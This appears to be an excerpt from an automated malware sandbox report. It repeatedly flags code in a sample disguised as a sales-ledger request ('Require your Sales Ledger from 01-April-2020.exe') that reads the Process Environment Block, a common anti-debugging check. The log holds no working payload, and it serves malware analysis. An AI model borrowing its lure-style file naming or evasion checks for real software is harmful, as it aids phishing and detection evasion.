Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01210050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01210050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012390AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01273884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01273884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012AD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012753CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01208A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01213A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0123927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01284257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0127A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011FAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01233D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01273540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012A3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01217D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012235A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012A8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0121746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0122A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe	Code function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h]
